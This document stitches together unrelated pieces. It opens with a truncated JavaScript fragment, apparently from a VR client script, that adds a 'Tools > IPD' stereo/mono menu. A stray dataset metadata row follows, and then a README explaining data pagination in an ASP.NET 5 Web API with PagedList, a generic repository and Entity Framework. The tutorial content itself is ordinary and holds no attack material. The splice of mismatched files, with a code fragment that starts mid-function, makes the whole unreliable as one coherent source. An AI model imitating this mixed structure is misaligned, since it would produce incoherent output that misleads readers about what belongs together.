if (!Menu.menuExists("Tools > IPD")) {
Menu.addMenu("Tools > IPD");
}
if (!Menu.menuItemExists("Tools > IPD", "Stereo")) {
Menu.addMenuItem({
menuName: "Tools > IPD",
menuItemName: "Stereo",
isCheckable: true,
isChecked: true
});
}
if (!Menu.menuItemExists("Tools > IPD", "Mono")) {
Menu.addMenuItem({
menuName: "Tools > IPD",
menuItemName: "Mono",
isCheckable: true,
isChecked: false
});
}
}
function menuItemEvent(menuItem) {
if (menuItem == "Stereo") {
Menu.setIsOptionChecked("Mono", false);
HMD.ipdScale = 1.0;
}
if (menuItem == "Mono") {
Menu.setIsOptionChecked("Stereo", false);
HMD.ipdScale = 0.0;
}
}
function scriptEnding() {
Menu.removeMenuItem("Tools > IPD", "Stereo");
Menu.removeMenuItem("Tools > IPD", "Mono");
Menu.removeMenu("Tools > IPD");
//reset the HMD to stereo mode
HMD.setIPDScale(1.0);
}
setupipdMenu();
Menu.menuItemEvent.connect(menuItemEvent);
Script.scriptEnding.connect(scriptEnding);
|
Markdown
|
UTF-8
| 20,342 | 2.921875 | 3 |
[] |
no_license
|
# Data Pagination
In this repository we implement data ==pagination== with an ASP.NET 5 Web API. The project uses the Repository Pattern and a Generic Repository (*GenericRepository*) together with the *Entity Framework* ORM to access data in the database.
The project has the following structure:
```xml
PagProj
│ appsettings.Development.json
│ appsettings.json
│ PagProj.csproj
│ Program.cs
│ Startup.cs
│
├───Business
│ │ StudentBusiness.cs
│ │
│ └───Interface
│ IStudentBusiness.cs
│
├───Controllers
│ StudentController.cs
│
├───Models
│ │ BaseEntity.cs
│ │ Student.cs
│ │
│ ├───Context
│ │ ApplicationContext.cs
│ │
│ └───Pagination
│ PagedList.cs
│ PaginationParameters.cs
│
└───Repository
│ GenericRepository.cs
│
├───Interface
│ IRepository.cs
│
└───Scripts
students.sql
```
To demonstrate pagination, we use the `Student` model:
```C#
using System;
using System.ComponentModel.DataAnnotations.Schema;
namespace PagProj.Models
{
[Table("students")]
public class Student : BaseEntity
{
[Column("full_name")]
public string FullName { get; set; }
[Column("birth_date")]
public DateTime BirthDate { get; set; }
[Column("document")]
public string Document { get; set; }
[Column("phone_number")]
public string PhoneNumber { get; set; }
[Column("full_address")]
public string FullAddress { get; set; }
}
}
```
This model inherits from `BaseEntity`:
```C#
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
namespace PagProj.Models {
public class BaseEntity {
[Key]
[Column("id")]
public long Id { get; set; }
}
}
```
> The `BaseEntity` model is used to constrain the `GenericRepository`. Every domain model inherits from this class since, just like in the database, all of them have an `id` column.
The ==Repository > Scripts== folder contains the script that builds the `students` database:
```sql
CREATE DATABASE paginationdb;
USE paginationdb;
CREATE TABLE students (
id INT(11) NOT NULL AUTO_INCREMENT,
full_name VARCHAR(100) NOT NULL DEFAULT '0',
birth_date DATE NULL DEFAULT NULL,
document VARCHAR(100) NOT NULL DEFAULT '0',
phone_number VARCHAR(100) NOT NULL DEFAULT '0',
full_address VARCHAR(130) NOT NULL DEFAULT '0',
PRIMARY KEY (id)
)
ENGINE=InnoDB DEFAULT CHARSET=LATIN1;
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Bobby', '2021-02-08', '154937604-7', '117-452-5548', '367 Tony Road');
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Jaime', '2022-08-06', '703467618-6', '812-655-7525', '5 Gulseth Drive');
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Patty', '2021-01-01', '443424220-2', '320-889-9198', '5 Waubesa Plaza');
...
...
```
> Besides creating the database, this script inserts 1000 rows into the `students` table.
# Pagination Parameters
Defining pagination requires two main attributes:
- `PageSize`, the number of records per page;
- `PageNumber`, the current page being requested.
These attributes must be provided in the request, so we create a `PaginationParameters` model stored in ==Models > Pagination==. It is defined as follows:
```C#
namespace PagProj.Models.Pagination {
public class PaginationParameters {
const int MAX_PAGE_SIZE = 50;
private int _pageSize = 10;
public int PageNumber { get; set; } = 1;
public int PageSize {
get => _pageSize;
set => _pageSize = value > MAX_PAGE_SIZE? MAX_PAGE_SIZE : value;
}
public PaginationParameters() { }
public PaginationParameters(int pageNumber, int pageSize)
{
this.PageNumber = pageNumber;
this.PageSize = pageSize;
}
}
}
```
It contains the following members:
- `MAX_PAGE_SIZE` defines the maximum `PageSize` (records per page) that the *client* may request. In this example we limit it to 50 records per page;
- `_pageSize`, a private field (initialized to 10) that holds the number of records per page;
- The `PageNumber` property, the current page requested by the *client*;
- The `PageSize` property, which guards the value of `_pageSize` when it is assigned: the setter checks whether the value sent by the *client* exceeds `MAX_PAGE_SIZE`; if so, `_pageSize` becomes `MAX_PAGE_SIZE`, otherwise it becomes the value provided (see the short example below).
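To make the clamping concrete, here is a minimal sketch (the values are purely illustrative) of what a consumer of `PaginationParameters` would observe:
```C#
using System;
using PagProj.Models.Pagination;

// Hypothetical usage, only to illustrate the setter's clamping logic.
var parameters = new PaginationParameters(pageNumber: 3, pageSize: 200);

// 200 exceeds MAX_PAGE_SIZE (50), so the setter stores 50 instead.
Console.WriteLine(parameters.PageSize);   // 50
Console.WriteLine(parameters.PageNumber); // 3

parameters.PageSize = 25;                 // within the limit, kept as-is
Console.WriteLine(parameters.PageSize);   // 25
```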
## Receiving the Parameters in the Controller
Next we look at the implementation of our `Get` method with pagination. For that, we create the `StudentController` *controller*:
```C#
using System.Text.Json;
using Microsoft.AspNetCore.Mvc;
using PagProj.Business.Interface;
using PagProj.Models.Pagination;
namespace PagProj.Controllers
{
[ApiController]
[Route("api/[controller]")]
public class StudentController : ControllerBase
{
private readonly IStudentBusiness _studentBusiness;
public StudentController(IStudentBusiness studentBusiness)
{
_studentBusiness = studentBusiness;
}
[HttpGet("{PageNumber}/{PageSize}")]
public IActionResult Get([FromRoute] PaginationParameters paginationParameters)
{
var students = _studentBusiness.GetAll(paginationParameters);
var metadata = new {
students.TotalCount,
students.PageSize,
students.CurrentPage,
students.HasNext,
students.HasPrevious,
students.TotalPages
};
Response.Headers.Add("X-Pagination", JsonSerializer.Serialize(metadata));
return Ok(students);
}
    }
}
```
A few observations about this code:
- Note that the route requires the `PageNumber` (current page) and the `PageSize` (items per page), and these values are automatically bound to the `paginationParameters` parameter. We specify `[FromRoute]` to make explicit that the data comes from the route;
- The `paginationParameters` pagination data is passed to the `StudentBusiness` business layer (shown below), which returns an object of type `PagedList` (a type we will create later);
- An anonymous object is built with the pagination data of the returned `PagedList` and added to the `X-Pagination` response `HEADER` of the request (an example is shown right after this list);
- Finally we return an `Ok` to the user with the `PagedList students` containing the students.
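For illustration, assuming the 1000-row sample database and a request for page 10 with 20 records per page (`GET /api/student/10/20`), the `X-Pagination` header produced by the anonymous `metadata` object would look roughly like this (hypothetical values, but consistent with the code above):
```json
{
    "TotalCount": 1000,
    "PageSize": 20,
    "CurrentPage": 10,
    "HasNext": true,
    "HasPrevious": true,
    "TotalPages": 50
}
```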
# Business Layer
There is nothing unusual in the business layer: it is made up of the `IStudentBusiness` interface and its `StudentBusiness` implementation, shown below:
```C#
using PagProj.Models;
using PagProj.Models.Pagination;
namespace PagProj.Business.Interface
{
public interface IStudentBusiness
{
PagedList<Student> GetAll(PaginationParameters paginationParameters);
}
}
```
And its implementation:
```C#
using PagProj.Business.Interface;
using PagProj.Models;
using PagProj.Models.Pagination;
using PagProj.Repository.Interface;
namespace PagProj.Business
{
public class StudentBusiness : IStudentBusiness
{
private readonly IRepository<Student> _repository;
public StudentBusiness(IRepository<Student> repository)
{
_repository = repository;
}
public PagedList<Student> GetAll(PaginationParameters paginationParameters)
{
return _repository.GetAll(paginationParameters);
}
}
}
```
Notice that the `GetAll` method receives the pagination parameters and returns a `PagedList` of type `Student`.
# Creating the PagedList Type
The whole point of pagination is to return a paged list, and nothing better than creating a dedicated type for that. For this need we create the generic `PagedList` type:
```C#
using System.Linq;
using System;
using System.Collections.Generic;
namespace PagProj.Models.Pagination
{
public class PagedList<T> : List<T>
{
public int CurrentPage { get; private set; }
public int TotalPages { get; private set; }
public int PageSize { get; private set; }
public int TotalCount { get; private set; }
public bool HasPrevious => CurrentPage > 1;
public bool HasNext => CurrentPage < TotalPages;
public PagedList(IQueryable<T> source, int pageNumber, int pageSize)
{
this.TotalCount = source.Count();
this.PageSize = pageSize;
this.CurrentPage = pageNumber;
this.TotalPages = (int)Math.Ceiling(TotalCount / (double)this.PageSize);
var items = source.Skip((this.CurrentPage - 1) * this.PageSize)
.Take(this.PageSize)
.ToList();
this.AddRange(items);
}
}
}
```
Note that since this is a new type derived from `List`, we must declare that it inherits from `List<T>`. The class declaration therefore becomes `public class PagedList<T> : List<T>`, forwarding the generic type `T` to `List`.
Now let's go through every attribute of this new type:
- `CurrentPage` stores the `PageNumber` (current page) requested by the *client*;
- `TotalPages` stores the total number of pages, computed from the total number of records `TotalCount` and the number of records per page `PageSize`;
- `PageSize` stores the number of records per page;
- `TotalCount` stores the total number of records;
- `HasPrevious` is `true` when a previous page exists and `false` otherwise. The check uses `CurrentPage`: if the current page is less than or equal to 1, there is nothing to go back to;
- `HasNext` is `true` when a next page exists and `false` otherwise. This check also uses `CurrentPage`, comparing it against the total number of pages `TotalPages`: if `CurrentPage` is smaller than `TotalPages` we have not reached the last page yet, so it returns `true`; if it is greater than or equal, it returns `false`.
Besides describing the attributes of this new type, we need to explain its single constructor, which also defines some characteristics particular to the type:
- The constructor receives an object of type `IQueryable<T>` as a parameter. This type belongs to the `Linq` namespace and represents the *query*; `IQueryable<T>` is implemented by `DbSet`, so a `DbSet` can be passed through this parameter;
- The constructor also receives `pageNumber`, assigned to `CurrentPage`, and `pageSize`, assigned to `PageSize`;
- To obtain `TotalCount`, i.e. the total number of records, the `Count` method of `IQueryable<T> source` is used;
- To compute `TotalPages` we divide the total number of records `TotalCount` by the number of records per page, using `Math.Ceiling` to round the result of the division up; the integer part of the value returned by `Math.Ceiling` is assigned to `TotalPages` (see the quick check below).
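As a quick sanity check with the sample data: for the 1000 students inserted by the SQL script and a `PageSize` of 20, this gives $$1000 / 20 = 50$$ pages; with a `PageSize` of 30 it gives $$\lceil 1000 / 30 \rceil = 34$$ pages, since `Math.Ceiling` rounds the division up.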
Finally we get to the cherry on top: starting from the *query* `IQueryable<T> source`, we use the LINQ methods `Skip` and `Take` to return the paged data of the slice specified by `CurrentPage` and `PageSize`:
- The `Skip` method indicates the position from which data will be returned. The starting point of the page is obtained by multiplying `CurrentPage - 1` by the number of items per page `PageSize`.
    - For example, if we are on page 10 (`CurrentPage = 10`) and requesting 20 records per page (`PageSize = 20`), the first record of that page is at $$(10 - 1) * 20 = 180$$, that is, position 180.
- The `Take` method indicates that, starting from the `Skip` position, $$N$$ items will be returned, where $$N$$ is the number of items per page, i.e. `Take(PageSize)`;
- At the end the result is converted to a `List` with `ToList()`.
At this point the `items` list contains all the elements of the page requested by the *client*.
It is important to remember that we are building a type based on `List`, so inside the class itself we can use the list methods to add the elements of `items` to the `PagedList`, which is what `AddRange(items)` does.
The `PagedList` is handled exactly like a `List`, including its methods and attributes. The difference between the two lies in the extra attributes in the body of `PagedList` and in how it is initialized: to create an object of type `PagedList` you must supply the `query`, the `PageSize` and the `PageNumber`.
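As a minimal sketch (not part of the original project), the type can also be exercised against an in-memory sequence via `AsQueryable()`, which makes it easy to see how the paging properties are filled in:
```C#
using System;
using System.Linq;
using PagProj.Models.Pagination;

// 95 fake records, already ordered.
var numbers = Enumerable.Range(1, 95).AsQueryable();

// Page 4 with 10 items per page: Skip((4 - 1) * 10) and Take(10).
var page = new PagedList<int>(numbers, pageNumber: 4, pageSize: 10);

Console.WriteLine(page.TotalCount);         // 95
Console.WriteLine(page.TotalPages);         // 10
Console.WriteLine(page.CurrentPage);        // 4
Console.WriteLine(page.HasPrevious);        // True
Console.WriteLine(page.HasNext);            // True
Console.WriteLine(string.Join(", ", page)); // 31, 32, ..., 40
```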
# Repository
In the repository we need to implement the paged GET. In this project we are using a Generic Repository and the Repository Pattern. Here is how our `IRepository` interface looks:
```C#
using PagProj.Models;
using PagProj.Models.Pagination;
namespace PagProj.Repository.Interface
{
public interface IRepository<T> where T : BaseEntity
{
PagedList<T> GetAll(PaginationParameters paginationParameters);
T GetById(long id);
T Create(T item);
T Update(T item);
bool Delete(long id);
}
}
```
Nothing very different in the interface; there is a single change: the `GetAll` method returns a `PagedList<T>` instead of a `List<T>` or `IEnumerable<T>` as before, and it receives an object of type `PaginationParameters`. Now on to the `GenericRepository` implementation:
```C#
using System.Data;
using System;
using System.Linq;
using Microsoft.EntityFrameworkCore;
using PagProj.Models;
using PagProj.Models.Pagination;
using PagProj.Models.Context;
using PagProj.Repository.Interface;
namespace PagProj.Repository
{
public class GenericRepository<T> : IRepository<T> where T : BaseEntity
{
private readonly ApplicationContext _context;
private readonly DbSet<T> _dataset;
public GenericRepository(ApplicationContext context)
{
_context = context;
_dataset = _context.Set<T>();
}
public T GetById(long id) => _dataset.SingleOrDefault(i => i.Id.Equals(id));
public PagedList<T> GetAll(PaginationParameters paginationParameters)
{
PagedList<T> pagedList = new PagedList<T>(
_dataset.OrderBy(i => i.Id),
paginationParameters.PageNumber,
paginationParameters.PageSize
);
return pagedList;
}
public T Create(T item)
{
try {
_dataset.Add(item);
_context.SaveChanges();
return item;
} catch(Exception) {
throw;
}
}
public T Update(T item)
{
var result = _dataset.SingleOrDefault(i => i.Id.Equals(item.Id));
if (result != null) {
try {
_context.Entry(result).CurrentValues.SetValues(item);
_context.SaveChanges();
return result;
} catch (Exception) {
throw;
}
}
return null;
}
public bool Delete(long id)
{
var result = _dataset.SingleOrDefault(i => i.Id.Equals(id));
if (result != null) {
try {
_dataset.Remove(result);
_context.SaveChanges();
return true;
} catch (Exception) {
throw;
}
}
return false;
}
}
}
```
Nothing much different here except for the `GetAll` method:
```C#
public PagedList<T> GetAll(PaginationParameters paginationParameters)
{
PagedList<T> pagedList = new PagedList<T>(
_dataset.OrderBy(i => i.Id),
paginationParameters.PageNumber,
paginationParameters.PageSize
);
return pagedList;
}
```
Note that we create an object of type `PagedList<T>` and return it at the end of the `GetAll` method. As mentioned earlier:
- The `IQueryable<T>` object is passed in, which in this case is the `DbSet<T> _dataset`;
> It is important to use `OrderBy`; the application itself logs a *warning* stressing this, as shown in the image below:
>
> 
>
> The reason is the following problem: imagine the list is ordered one way on the first page request and differently on the second. That can result in elements showing up several times, or in elements that never appear in the pagination at all.
- The `PaginationParameters` values are also passed in: the `PageNumber` (or `CurrentPage`) and the `PageSize`.
From this point on we have a paged `PagedList` object with the *query* executed against the database.
# Configuration
A few configurations were made in `Startup.cs`, namely:
- Reading the *ConnectionString* from `appsettings.json` and configuring *Entity Framework*:
```C#
var connectionString = Configuration["ConnectionStrings:MySqlConnectionString"];
services.AddDbContext<ApplicationContext> (
op => op.UseMySql(connectionString, ServerVersion.AutoDetect(connectionString))
);
```
- Configuring *Swagger*:
```C#
services.AddSwaggerGen(c =>
{
c.SwaggerDoc("v1", new OpenApiInfo {
Title = "PagProj",
Version = "v1",
Description = "Base project for Data Pagination",
Contact = new OpenApiContact {
Name = "Ellison Guimarães",
Email = "ellison.guimaraes@gmail.com",
Url = new Uri("https://github.com/ellisonguimaraes")
}
});
// Configure XML Comments to Swagger
var xmlFile = $"{Assembly.GetExecutingAssembly().GetName().Name}.xml";
var xmlPath = Path.Combine(AppContext.BaseDirectory, xmlFile);
c.IncludeXmlComments(xmlPath);
});
```
- The Dependency Injection (DI) registrations for the Generic Repository (*GenericRepository*) and the business layer:
```C#
services.AddScoped(typeof(IRepository<>), typeof(GenericRepository<>));
services.AddScoped<IStudentBusiness, StudentBusiness>();
```
The *ConnectionString* was also added to `appsettings.json`:
```json
{
"ConnectionStrings": {
"MySqlConnectionString": "Server=localhost;DataBase=paginationdb;Uid=root;Pwd=admin"
},
"Logging": {
"LogLevel": {
"Default": "Information",
"Microsoft": "Warning",
"Microsoft.Hosting.Lifetime": "Information"
}
},
"AllowedHosts": "*"
}
```
Finally, we need to add the settings that generate the *Swagger* documentation file to the `csproj` file:
```xml
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>net5.0</TargetFramework>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="Pomelo.EntityFrameworkCore.MySql" Version="5.0.1" />
<PackageReference Include="Swashbuckle.AspNetCore" Version="5.6.3" />
</ItemGroup>
<!-- SWAGGER XML COMMENTS -->
<PropertyGroup>
<GenerateDocumentationFile>true</GenerateDocumentationFile>
<NoWarn>$(NoWarn);1591</NoWarn>
</PropertyGroup>
</Project>
```
# References
[Paging in ASP.NET Core Web API - Code Maze (code-maze.com)](https://code-maze.com/paging-aspnet-core-webapi/)
[Paging in ASP.NET Core Web API - YouTube](https://www.youtube.com/watch?v=nRyLXP7WLxI&ab_channel=CodeMaze)
|